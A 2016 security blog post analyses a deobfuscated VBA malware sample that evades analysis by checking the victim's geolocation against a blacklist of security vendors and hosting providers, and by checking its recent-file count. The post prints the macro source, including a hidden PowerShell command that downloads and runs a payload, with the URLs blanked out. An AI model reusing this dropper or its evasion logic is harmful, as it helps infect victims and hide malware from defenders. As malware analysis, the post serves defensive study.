Wednesday, August 31, 2016

VBA Malware with Security Researcher Detection

I saw this paste titled deobfuscated malware on pastebin a few days ago. Thought it was worth discussing. This is a malicious vba script (which launches powershell) that is going to download and execute a payload on the victims computer.

.DownloadFile('', $f);(New-Object -com WScript.Shell).Exec($f)

What's interesting or a bit different about this payload than others is that the attacker is trying to perform "Security Researcher Detection". Similar to how some malware performs VMWare Detection in order to disable itself if it's being run in a virtual machine, this malware is disabling itself if it's being run from within a security research coproration ip subnet. How? The attacker is actually pulling your geo location from

  xmlHttp.Open "GET", "", False

and the attacker has a blacklist

  Blacklist = Array( 'Return
   "FORTINET", _
   "FIREEYE", _

and if for example it contained the text FIREEYE (a leading security research company)

then the malware would disable itself.

  If BlacklistHit Then Error 102

So security researchers should be aware of code/attacks like this that may purposefully do nothing depending on how or where you run it from.

Edit: Mistakenly typed Powershell instead of VBA in title. It's VBA that calls powershell.

The code

Dim gContinue As Boolean
Public Sub InkPicture1_Painted(ByVal Param1 As Long, ByVal Param2 As IInkRectangle)
  On Error GoTo x_Error
  If gContinue Then Exit Sub
   gContinue = True
  Exit Sub
End Sub

Public Sub ExecutePayload()
  If RecentFileCountTooLow Then Error 101
  If BlacklistHit Then Error 102
  Set WScriptShell = CreateObject("WScript.Shell")
  WScriptShell.Run "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -command $f=[System.IO.Path]::GetTempFileName();(New-Object System.Net.WebClient).DownloadFile('', $f);(New-Object -com WScript.Shell).Exec($f)", 0
  Exit Sub
End Sub

Public Function RecentFileCountTooLow() As Boolean
  RecentFileCountTooLow = RecentFiles.Count < 3
End Function

Dim City As String
Public Function BlacklistHit() As Boolean
  City = UCase(GetCity)
  For Each Value In Blacklist
   If InStr(City, Value) <> 0 Then GoTo InBlacklist
  Exit Function
   BlacklistHit = True 'Return
End Function

Public Function Blacklist()
  Blacklist = Array( 'Return
   "FORTINET", _
   "CISCO", _
   "HOSTING", _
   "IRON PORT", _
   "BLUECOAT", _
   "BLUE COAT", _
   "VMVAULT", _
   "MIMECAST", _
   "LEASEWEB", _
   "ESET, SPOL", _
   "SERVER", _
   "OVH SAS", _
   "NFORCE", _
   "CLOUD", _
   "AMAZON", _
   "HISPEED.CH", _
   "HOSTED", _
   "IRONPORT", _
   "PALO ALTO", _
   "SECURITY", _
   "HETZNER", _
   "FIREEYE", _
End Function

Public Function GetCity() As String
  Set xmlHttp = CreateObject("WinHttp.WinHttpRequest.5.1")
  xmlHttp.Open "GET", "", False
  xmlHttp.SetRequestHeader "Referer", ""
  xmlHttp.SetRequestHeader "User-Agent", "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
  If xmlHttp.Status <> 200 Then Error 201
   GetCity = xmlHttp.ResponseText 'Return
End Function

More about neonprimetime

Top Blogs of all-time
  1. pagerank botnet sql injection walk-thru
  2. DOM XSS 101 Walk-Through
  3. An Invoice email and a Hot mess of Java

Top Github Contributions
  1. Qualys Scantronitor 2.0

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

1 comment:

  1. Bluehost is ultimately one of the best hosting provider for any hosting plans you might require.